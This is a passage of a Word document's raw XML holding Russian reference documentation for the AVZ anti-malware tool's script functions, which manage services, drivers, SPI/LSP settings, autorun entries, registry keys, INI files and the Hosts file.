        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>указанным</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CLSID. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CLSID рекомендуется передавать без фигурных скобок.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lastRenderedPageBreak/>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ServiceExists(AName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поиск регистрационных данных в реестре. Возвращает true при условии, что в реестре зарегистрирована служба или драйвер с указанным именем AName.</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ServiceAndFileExists(AName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поиск регистрационных данных в реестре и соответствующего файла на диске. Возвращает true при условии, что в реестре зарегистрирована служба или драйвер с указанным именем, и соответствующий ей файл найден на диске.</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StartService(AName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запуск службы или загрузку драйвера с указанным именем.</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StopService(AName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остановку службы или выгрузку драйвера с указанным им</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нем.</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DeleteService(AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ADelFile : boolean = false)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из реестра службу или драйвер с именем AName. Функция во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вращает true в случае успешного удаления службы и false в случае ошибки. Второй параметр ADelFile (параметр необязательный и его можно не указ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вать) задает режим удаления. По умолчанию он равен false – в результате при удалении регистрационных данных драйвера из реестра файл на диске не уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ляется. Если ADelFile=true, то после удаления данных из реестра производится попытка удаления файла драйвера с диска.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GetServiceFile(AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)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полное имя исполняемого файла указанной службы или драйвера. Если служба или драйвер с указанным именем не найдена, то во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вращается пустая строка.</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GetServiceStart(AServiceName: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):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код режима автозапуска службы или драйвера с именем AServiceName.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SetServiceStart(AServiceName: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; AStart: integer):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Устанавливает код режима автозапуска равный AStart для службы или драйвера с именем AServiceName. Возвращает True в случае успешной уст</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>новки кода режима и false в случае ошибки.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GetServiceName(AServiceName: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">):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отображаемое имя службы или драйвера с именем AServiceName. Отображаемое имя является необязательным и хранится в р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>естре, его удобно применять при формировании протоколов в качестве уточн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ющей информации. В случае ошибки функция возвращает пустую строку.</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DelSPIByFileName(ALibrary : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>; NameCompare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Удаляет SPI/LSP провайдер по имени библиотеки–поставщика ALibrary. Параметр NameCompare управляет алгоритмом сравнения имен – если он равен false, то производится </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>сравнение полного имени файлов. Если NameCompare=true, то сравниваются только имена файлов, без пути. Сравнение имен файлов идет без учета регистра, имена файлов перед сравнением подве</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гаются нормализации.</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CheckSPI;</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проверку настроек SPI/LSP. В случае обнаружения ошибок информация вносится в протокол.</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AutoFixSPI;</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анализ настроек SPI/LSP и автоматически исправляет все о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>наруженные ошибки. Начиная с версии 4.26 перед исправлением ошибок при вызове данной функции AVZ автоматически создает резервную копию настр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ек в папке BackUp. Резервная копия является стандартным REG файлом.</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DelWinlogonNotifyByFileName(AFileName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удаление из реестра регистрации элемента Winlogon, соо</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ветствующего заданному имени файла. В качестве AFileName можно передать только имя файла или полное имя файла, включая путь.</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DelWinlogonNotifyByKeyName(AKeyName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Удаляет элемент Winlogon по известному имени ключа в реестре.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DelAutorunByFileName(AKeyName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элемент автозапуска по имени файла. В качестве AFileName можно передать только имя файла или полное имя файла, включая путь.</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RegKeyExists(ARoot, AName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true, если в реестре существует и доступен ключ AName в разделе ARoot, и false в случае отсутствия ключа или указания недопустимых параметров. false так–же возвращается, если ключ существует, но нет даже м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нимальных привилегий для доступа к нему.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RegKeyExistsEx(ARoot, AName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true, если в реестре существует ключ AName в разделе ARoot, и false в случае отсутствия ключа или указания недопустимых параметров.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RegKeyDel(ARoot, AName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указанный ключ реестра. AName – имя ключа, ARoot – имя ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дела.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RegKeyCreate(ARoot, AName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Создает ключ реестра с указанным именем. AName – имя ключа, ARoot – имя раздела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RegKeyParamExists(ARoot, AName, AParam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TRUE, если в ключе с именем AName существует параметр AParam.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RegKeyParamDel(ARoot, AName, AParam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lastRenderedPageBreak/>
        <w:t>Производит удаление параметра с именем AParam ключа AName в разд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ле ARoot. Указание несуществующего параметра, ключа или раздела не являе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся ошибкой.</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RegKeyStrParamRead(ARoot, AName, AParam : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserv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чтение текстового параметра с имененем AParam ключа AName раздела ARoot. Указание несуществующего параметра, ключа или ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дела не является ошибкой – в этом случае функция возвращает пустую строку.</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RegKeyIntParamRead(ARoot, AName, AParam : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) : dword;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чтение параметра типа REG_DWORD с имененем AParam ключа AName раздела ARoot. Указание несуществующего параметра, ключа или раздела не является ошибкой – в этом случае функция возвращает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RegKeyStrParamWrite(ARoot, AName, AParam, AValue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Записывает значение AValue в параметр AParam типа REG_SZ (строка) ключа реестра AName в разделе ARoot. В случае отсутствия ключа или пар</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>метра они автоматически создаются.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RegKeyIntParamWrite(ARoot, AName, AParam : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">string; </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AValue : dword);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Записывает значение AValue в параметр AParam типа REG_DWORD (числовое значение) ключа реестра AName в разделе ARoot. В случае отсу</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствия ключа или параметра они автоматически создаются.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RegKeyBinParamWrite(ARoot, AName, AParam : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>; AValue : dword);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Записывает значение AValue в параметр AParam типа REG_BINARY (б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нарное значение произвольной длинны) ключа реестра AName в разделе ARoot. В случае отсутствия ключа или параметра они автоматически создаются.</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Значение бинарного параметра передается в текстовом виде, побайтно. Каждый байт кодируется в шеснадцатеричном формате, разделителями являе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся запятая. Предшествующие нули в числах и пробелы игнорируются.</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RegKeyParamWrite(ARoot, AName, AParam : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; AType, AValue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Записывает значение AValue в параметр AParam типа AType ключа р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>естра AName в разделе ARoot.</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RegSearch(ARoot, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AName, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AValue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сканирование ключа AName раздела реестра ARoot и ос</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ществляет поиск образца AValue.</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ExpRegKey(ARoot, AName, AFileName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Выполняет экспорт ключа реестра. Экспортируется ключ AName раздела реестра ARoot в файл с именем AFileName.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lastRenderedPageBreak/>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExpRegKeyEx(ARoot, AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; Lines : TStrings)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экспорт ключа реестра. Экспортируется ключ AName раздела реестра ARoot в массив строк Lines.</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BackupRegKey(ARoot, AName, ABackupName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резервное копирование ключа реестра.</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RegKeyEnumVal(ARoot, AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; AList : TStrings);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Строит список вложенных ключей ключа реестра AName. Список AList должен быть создан и инициализирован перед вызовом данной функции.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RegKeyEnumKey(ARoot, AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; AList : TStrings);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Строит список вложенных ключей ключа реестра AName. Список AList должен быть создан и инициализирован перед вызовом данной функции.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RegKeyResetSecurity(ARoot, AName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все привилегии ключа реестра AName, делая его доступным для всех пользователей. Данная функция полезна для удаления ключей реестра, с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зданных вредоносными программами – нередко после создания ключа зл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вред меняет привилегии доступа к нему, блокируя все операции, кроме чтения.</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INIStrParamRead(AFileName, ASectionName, AParamName, ADefVal : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)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Осуществляет чтение параметра с именем AParamName из секции ASectionName файла INI с именем AFileName. Если такой параметр существ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ет, то возвращается его значение, если параметр не существует – то возвращ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ется значение по умолчанию ADefVal.</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INIStrParamWrite(AFileName, ASectionName, AParamName, AParamVal : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Осуществляет запись параметра с именем AParamName из секции ASectionName файла INI с именем AFileName. Если такой параметр не сущ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствует, то он автоматически, аналогично происходит с секцией и файлом. Функция возвращает true в случае успешного выполнения и false в случае ошибки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INISectionExists(AFileName, ASectionName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проверку, существует ли в INI файле с именем AFileName секция с именем ASectionName. Возвращает true, если секция существует и false в случае любой ошибки или отсутствия секции.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INIEraseSection(AFileName, ASectionName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удаление из INI файла с именем AFileName секции с именем ASectionName. Возвращает true, если удаление успешно выполнено и false в случае ошибки.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INIEraseParam(AFileName, ASectionName, AParamName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w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>удаление</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>из</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> INI </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>именем</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AFileName </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>параметра</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AParamName </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>секции</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ASectionName. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Возвращает true, если удаление успешно выполнено и false в случае ошибки.</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GetHostsFileName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полное имя файла Hosts в системе. Функция учитывает тот факт, что в NT местоположение файла Hosts может быть настроено через р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>естр.</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ClearHostsFile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w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>очистку</w:t>
      </w:r>
